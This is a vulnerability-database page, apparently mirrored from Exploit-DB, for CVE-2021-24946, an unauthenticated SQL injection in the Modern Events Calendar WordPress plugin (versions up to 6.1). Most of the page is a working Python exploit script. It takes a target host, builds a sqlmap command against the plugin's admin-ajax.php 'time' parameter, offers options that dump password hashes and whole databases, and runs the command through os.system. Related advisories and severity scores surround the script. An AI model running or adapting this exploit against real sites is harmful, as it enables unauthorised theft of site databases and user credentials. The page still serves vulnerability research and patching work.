Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress Plugin Modern Events Calendar V 6.1 - SQL Injection (Unauthenticated)

🗓️ 27 Jan 2022 00:00:00Reported by Ron JostType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 315 Views

WordPress Plugin Modern Events Calendar V 6.1 SQL Injectio

Related
Code
ReporterTitlePublishedViews
Family
0day.today		WordPress Modern Events Calendar V 6.1 Plugin - SQL Injection (Unauthenticated) Exploit
27 Jan 202200:00
zdt
Circl		CVE-2021-24946
28 Feb 202218:48
circl
CNNVD		WordPress SQL注入漏洞
13 Dec 202100:00
cnnvd
CNVD		WordPress Modern Events Calendar Lite PluginSQL Injection Vulnerability
18 Dec 202100:00
cnvd
CVE		CVE-2021-24946
13 Dec 202110:41
cve
Cvelist		CVE-2021-24946 Modern Events Calendar < 6.1.5 - Unauthenticated Blind SQL Injection
13 Dec 202110:41
cvelist
Metasploit		WordPress Modern Events Calendar SQLi Scanner
1 Mar 202217:53
metasploit
Nuclei		WordPress Modern Events Calendar <6.1.5 - Blind SQL Injection
3 Jun 202606:04
nuclei
NVD		CVE-2021-24946
13 Dec 202111:15
nvd
OpenVAS		WordPress Modern Events Calendar Lite Plugin < 6.1.5 Multiple Vulnerabilities
18 Jan 202200:00
openvas
Rows per page
# Exploit Title: WordPress Plugin Modern Events Calendar V 6.1 - SQL Injection (Unauthenticated)
# Date 26.01.2022
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://webnus.net/modern-events-calendar/
# Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.6.1.0.zip
# Version: <= 6.1
# Tested on: Ubuntu 20.04
# CVE: CVE-2021-24946
# CWE: CWE-89
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24946/README.md

'''
Description:
The Modern Events Calendar Lite WordPress plugin before 6.1.5 does not sanitise and escape the time parameter
before using it in a SQL statement in the mec_load_single_page AJAX action, available to unauthenticated users,
leading to an unauthenticated SQL injection issue
'''

#Banner:
banner = '''

 .oOOOo.  o      'O o.OOoOoo                                                                                   
.O     o  O       o  O                 .oOOo. .oOOo. .oOOo.  oO             .oOOo. o   O  .oOOo. o   O  .oOOo. 
o         o       O  o                      O O    o      O   O                  O O   o  O    o O   o  O      
o         o       o  ooOO                   o o    O      o   o                  o o   o  o    O o   o  o      
o         O      O'  O       ooooooooo     O' o    o     O'   O   ooooooooo     O' OooOOo `OooOo OooOOo OoOOo. 
O         `o    o    o                    O   O    O    O     o                O       O       O     O  O    O 
`o     .o  `o  O     O                  .O    o    O  .O      O              .O        o       o     o  O    o 
 `OoooO'    `o'     ooOooOoO           oOoOoO `OooO' oOoOoO OooOO           oOoOoO     O  `OooO'     O  `OooO' 
                                                                                                               
                                                        [+] Modern Events Calendar Lite SQL-Injection
                                                        [@] Developed by Ron Jost (Hacker5preme)

'''

print(banner)

import requests
import argparse
from datetime import datetime
import os

# User-Input:
my_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events Calendar SQL-Injection (unauthenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH


# Exploit:
print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
print('[*] Payload for SQL-Injection:')
exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=mec_load_single_page&time=2" '
exploitcode_risk = ' -p time'
print('    Sqlmap options:')
print('     -a, --all           Retrieve everything')
print('     -b, --banner        Retrieve DBMS banner')
print('     --current-user      Retrieve DBMS current user')
print('     --current-db        Retrieve DBMS current database')
print('     --passwords         Enumerate DBMS users password hashes')
print('     --tables            Enumerate DBMS database tables')
print('     --columns           Enumerate DBMS database table column')
print('     --schema            Enumerate DBMS schema')
print('     --dump              Dump DBMS database table entries')
print('     --dump-all          Dump all DBMS databases tables entries')
retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
exploitcode = exploitcode_url +  retrieve_mode + exploitcode_risk
os.system(exploitcode)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 Jan 2022 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 27.5
CVSS 3.19.8
EPSS0.6014
wordpress pluginmodern events calendarversion 6.1sql injectionunauthenticatedexploit
315